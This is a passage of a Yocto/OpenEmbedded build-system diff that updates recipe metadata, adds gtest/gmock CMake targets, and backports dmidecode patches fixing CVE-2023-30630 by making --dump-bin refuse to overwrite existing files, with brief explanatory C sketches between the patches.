++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
++ endif()
++
++ __gtest_define_backwards_compatible_library_targets()
++endif()
++
++if(GMock_FOUND)
++ if(NOT TARGET GTest::gmock)
++ __gtest_determine_library_type(GMOCK_LIBRARY)
++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
++ set(_gmock_link_libraries "GTest::gtest")
++ if(TARGET Threads::Threads)
++ list(APPEND _gmock_link_libraries Threads::Threads)
++ endif()
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
++ endif()
++ if(GTEST_INCLUDE_DIRS)
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
++ endif()
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
++ endif()
++ if(NOT TARGET GTest::gmock_main)
++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gmock_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gmock")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
+ endif()
+ endif()
+diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
+index b65b9d28f6..7d3a378a65 100644
+--- a/Tests/FindGTest/Test/CMakeLists.txt
++++ b/Tests/FindGTest/Test/CMakeLists.txt
+@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
+ target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
+ target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
+ add_test(NAME test_gtest_var COMMAND test_gtest_var)
++
++add_executable(test_gmock_tgt main.cxx)
++target_link_libraries(test_gmock_tgt GTest::gmock_main)
++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE )
set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
-set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
-# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os).
-if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
- set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
-endif()
+set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
# Include the toolchain configuration subscripts
file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
foreach(config ${toolchain_config_files})
include(${config})
endforeach()
+
+unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
+unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
is to provide a single front end for all tests."
+HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
SECTION = "devel"
DEPENDS += "expect-native"
+RDEPENDS_${PN} = "expect"
inherit autotools
diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
-SECTION = "console/utils"
SUMMARY = "Command line utilities for working with *.desktop files"
+DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
+SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
SUMMARY = "Sets up distcc for compilation on the target device"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-devtools/diffstat/diffstat_1.63.bb b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
index 61b2ea5dc2..863f924b22 100644
--- a/meta/recipes-devtools/diffstat/diffstat_1.63.bb
+++ b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
@@ -5,7 +5,7 @@ reviewing large, complex patch files."
HOMEPAGE = "http://invisible-island.net/diffstat/"
SECTION = "devel"
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://install-sh;endline=42;md5=b3549726c1022bee09c174c72a0ca4a5"
+LIC_FILES_CHKSUM = "file://COPYING;md5=a3d0bb117493e804b0c1a868ddf23321"
SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
file://run-ptest \
@@ -16,8 +16,6 @@ SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
SRC_URI[md5sum] = "b9272ec8af6257103261ec3622692991"
SRC_URI[sha256sum] = "7eddd53401b99b90bac3f7ebf23dd583d7d99c6106e67a4f1161b7a20110dc6f"
-S = "${WORKDIR}/diffstat-${PV}"
-
inherit autotools gettext ptest
EXTRA_AUTORECONF += "--exclude=aclocal"
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
SUMMARY = "A parallel build system"
DESCRIPTION = "distcc is a parallel build system that distributes \
compilation of C/C++/ObjC code across machines on a network."
+HOMEPAGE = "https://github.com/distcc/distcc"
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
RRECOMMENDS_${PN}-server = "avahi-daemon"
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
file://fix-gnome.patch \
file://separatebuilddir.patch \
file://default \
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
+From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:21 +0100
+Subject: [PATCH] dmidecode: Split table fetching from decoding
+
+Clean up function dmi_table so that it does only one thing:
+* dmi_table() is renamed to dmi_table_get(). It now retrieves the
+ DMI table, but does not process it any longer.
+* Decoding or dumping the table is now done in smbios3_decode(),
+ smbios_decode() and legacy_decode().
+No functional change.
+
+A side effect of this change is that writing the header and body of
+dump files is now done in a single location. This is required to
+further consolidate the writing of dump files.
+
+CVE-ID: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+---
+ dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
+ 1 file changed, 62 insertions(+), 24 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index a3e9d6c..d6eedd1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+ }
+ }
+
+-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+- u32 flags)
++/* Allocates a buffer for the table, must be freed by the caller */
++static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
++ const char *devmem, u32 flags)
+ {
+ u8 *buf;
+
+@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ {
+ if (num)
+ printf("%u structures occupying %u bytes.\n",
+- num, len);
++ num, *len);
+ if (!(opt.flags & FLAG_FROM_DUMP))
+ printf("Table at 0x%08llX.\n",
+ (unsigned long long)base);
+@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ * would be the result of the kernel truncating the table on
+ * parse error.
+ */
+- size_t size = len;
++ size_t size = *len;
+ buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
+ &size, devmem);
+- if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
++ if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
+ {
+ fprintf(stderr, "Wrong DMI structures length: %u bytes "
+ "announced, only %lu bytes available.\n",
+- len, (unsigned long)size);
++ *len, (unsigned long)size);
+ }
+- len = size;
++ *len = size;
+ }
+ else
+- buf = mem_chunk(base, len, devmem);
++ buf = mem_chunk(base, *len, devmem);
+
+ if (buf == NULL)
+ {
+@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ fprintf(stderr,
+ "Try compiling dmidecode with -DUSE_MMAP.\n");
+ #endif
+- return;
+ }
+
+- if (opt.flags & FLAG_DUMP_BIN)
+- dmi_table_dump(buf, len);
+- else
+- dmi_table_decode(buf, len, num, ver >> 8, flags);
+-
+- free(buf);
++ return buf;
+ }
+
+
+@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
+
+ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u32 ver;
++ u32 ver, len;
+ u64 offset;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x06] > 0x20)
+@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ return 0;
+ }
+
+- dmi_table(((off_t)offset.h << 32) | offset.l,
+- DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
++ /* Maximum length, may get trimmed */
++ len = DWORD(buf + 0x0C);
++ table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
++ devmem, flags | FLAG_STOP_AT_EOT);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x06],
+ opt.dumpfile);
+ write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, 0, ver >> 8,
++ flags | FLAG_STOP_AT_EOT);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u16 ver;
++ u16 ver, num;
++ u32 len;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x05] > 0x20)
+@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ printf("SMBIOS %u.%u present.\n",
+ ver >> 8, ver & 0xFF);
+
+- dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
+- ver << 8, devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x16);
++ num = WORD(buf + 0x1C);
++ table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x05],
+ opt.dumpfile);
+ write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ {
++ u16 ver, num;
++ u32 len;
++ u8 *table;
++
+ if (!checksum(buf, 0x0F))
+ return 0;
+
++ ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("Legacy DMI %u.%u present.\n",
+ buf[0x0E] >> 4, buf[0x0E] & 0x0F);
+
+- dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
+- ((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
+- devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x06);
++ num = WORD(buf + 0x0C);
++ table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", 0x0F,
+ opt.dumpfile);
+ write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
+From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:25 +0100
+Subject: [PATCH] dmidecode: Write the whole dump file at once
+
+When option --dump-bin is used, write the whole dump file at once,
+instead of opening and closing the file separately for the table
+and then for the entry point.
+
+As the file writing function is no longer generic, it gets moved
+from util.c to dmidecode.c.
+
+One minor functional change resulting from the new implementation is
+that the entry point is written first now, so the messages printed
+are swapped.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
+ util.c | 40 -------------------------------
+ util.h | 1 -
+ 3 files changed, 51 insertions(+), 59 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index d6eedd1..b91e53b 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ }
+ }
+
+-static void dmi_table_dump(const u8 *buf, u32 len)
++static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
++ u32 table_len)
+ {
++ FILE *f;
++
++ f = fopen(opt.dumpfile, "wb");
++ if (!f)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fopen");
++ return -1;
++ }
++
++ if (!(opt.flags & FLAG_QUIET))
++ printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
++ if (fwrite(ep, ep_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fseek(f, 32, SEEK_SET) != 0)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fseek");
++ goto err_close;
++ }
++
+ if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
+- write_dump(32, len, buf, opt.dumpfile, 0);
++ printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
++ if (fwrite(table, table_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fclose(f))
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fclose");
++ return -1;
++ }
++
++ return 0;
++
++err_close:
++ fclose(f);
++ return -1;
+ }
+
+ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x06],
+- opt.dumpfile);
+- write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x06], table, len);
+ }
+ else
+ {
+@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x05],
+- opt.dumpfile);
+- write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x05], table, len);
+ }
+ else
+ {
+@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", 0x0F,
+- opt.dumpfile);
+- write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, 0x0F, table, len);
+ }
+ else
+ {
+diff --git a/util.c b/util.c
+index eeffdae..2e1931c 100644
+--- a/util.c
++++ b/util.c
+@@ -247,46 +247,6 @@ out:
+ return p;
+ }
+
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
+-{
+- FILE *f;
+-
+- f = fopen(dumpfile, add ? "r+b" : "wb");
+- if (!f)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fopen");
+- return -1;
+- }
+-
+- if (fseek(f, base, SEEK_SET) != 0)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fseek");
+- goto err_close;
+- }
+-
+- if (fwrite(data, len, 1, f) != 1)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fwrite");
+- goto err_close;
+- }
+-
+- if (fclose(f))
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fclose");
+- return -1;
+- }
+-
+- return 0;
+-
+-err_close:
+- fclose(f);
+- return -1;
+-}
+-
+ /* Returns end - start + 1, assuming start < end */
+ u64 u64_range(u64 start, u64 end)
+ {
+diff --git a/util.h b/util.h
+index 3094cf8..ef24eb9 100644
+--- a/util.h
++++ b/util.h
+@@ -27,5 +27,4 @@
+ int checksum(const u8 *buf, size_t len);
+ void *read_file(off_t base, size_t *len, const char *filename);
+ void *mem_chunk(off_t base, size_t len, const char *devmem);
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
+ u64 u64_range(u64 start, u64 end);
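The consolidated dmi_table_dump() above writes the entry point first and then seeks to offset 32 before writing the table, so a dump file holds the entry point region at offset 0 followed by the DMI table at offset 32. A rough reader sketch of that layout, inferred from the fseek(f, 32, SEEK_SET) in the hunk and the commit message; this is not dmidecode's actual --from-dump code path:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    unsigned char ep[32];
    FILE *f = fopen(argc > 1 ? argv[1] : "dump.bin", "rb");
    if (!f)
        return 1;

    if (fread(ep, sizeof ep, 1, f) != 1) {        /* entry point region */
        fclose(f);
        return 1;
    }

    fseek(f, 0, SEEK_END);
    long table_len = ftell(f) - 32;               /* everything after offset 32 */
    fseek(f, 32, SEEK_SET);

    unsigned char *table = malloc(table_len > 0 ? (size_t)table_len : 1);
    if (table && table_len > 0)
        fread(table, (size_t)table_len, 1, f);    /* DMI table bytes */

    printf("entry point: 32 bytes, table: %ld bytes\n", table_len);
    free(table);
    fclose(f);
    return 0;
}
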
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
+From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:31 +0100
+Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
+
+Make sure that the file passed to option --dump-bin does not already
+exist. In practice, it is rather unlikely that an honest user would
+want to overwrite an existing dump file, while this possibility
+could be used by a rogue user to corrupt a system file.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
+
+Backport Changes:
+- Ignored changes in man/dmidecode.8 file.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index b91e53b..846d9a1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -60,6 +60,7 @@
+ * https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
+ */
+
++#include <fcntl.h>
+ #include <stdio.h>
+ #include <string.h>
+ #include <strings.h>
+@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
+ u32 table_len)
+ {
++ int fd;
+ FILE *f;
+
+- f = fopen(opt.dumpfile, "wb");
++ fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
++ if (fd == -1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("open");
++ return -1;
++ }
++
++ f = fdopen(fd, "wb");
+ if (!f)
+ {
+ fprintf(stderr, "%s: ", opt.dumpfile);
+- perror("fopen");
++ perror("fdopen");
+ return -1;
+ }
+
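The fix above relies on O_EXCL: opening with O_CREAT|O_EXCL fails with EEXIST instead of truncating the target when the path already exists, and the descriptor is then handed to stdio with fdopen(). A minimal standalone sketch of that behaviour; the file name here is only an example:

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    const char *path = "/tmp/dmidecode-dump.bin";

    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0666);
    if (fd == -1) {
        if (errno == EEXIST)
            fprintf(stderr, "%s: already exists, refusing to overwrite\n", path);
        else
            perror(path);
        return 1;
    }

    FILE *f = fdopen(fd, "wb");   /* hand the descriptor to stdio, as the patch does */
    if (!f) {
        close(fd);
        return 1;
    }
    fputs("example payload\n", f);
    fclose(f);
    return 0;
}
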
diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
SUMMARY = "DMI (Desktop Management Interface) table related utilities"
HOMEPAGE = "http://www.nongnu.org/dmidecode/"
+DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
file://0001-Committing-changes-from-do_unpack_extra.patch \
+ file://CVE-2023-30630-dependent_p1.patch \
+ file://CVE-2023-30630-dependent_p2.patch \
+ file://CVE-2023-30630.patch \
"
COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"
diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
